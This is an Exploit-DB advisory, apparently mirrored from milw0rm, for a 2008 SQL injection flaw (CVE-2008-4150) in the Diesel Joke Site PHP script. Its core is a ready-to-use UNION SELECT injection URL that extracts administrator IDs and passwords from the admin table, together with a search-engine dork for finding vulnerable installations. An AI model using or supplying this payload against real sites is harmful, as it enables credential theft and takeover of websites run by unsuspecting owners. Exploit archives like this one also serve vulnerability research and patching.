Diesel Joke Site picture_category.php id SQL Injection Vulnerability

2008-09-18T00:00:00
ID EDB-ID:6488
Type exploitdb
Reporter SarBoT511
Modified 2008-09-18T00:00:00

Description

Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability. CVE-2008-4150. Webapps exploit for php platform

                                        
                                            ################## sarbot511 #########################################################
#
#
#              jokes script  Remote SQL Injection Exploit
#
#    Founded by : sarbot511 
#    Dork: "All Rights Reserved. Powered by DieselScripts.com" 
#
##### Vuln Code: ###################################################################
#
#
###### Exploit #####################################################################
#
#   http://www.target.com/[path]/picture_category.php?id=-1%20union%20select%201,aid,3,4,5,6,7,8,apass,10,11,12%20from%20admin/*
#
###### Greets #######################################################################
#
#  Dr.LiNuX  ,  ABO3TB  , ALM511  ,master , all my frinds
#
####################################################################################

# milw0rm.com [2008-09-18]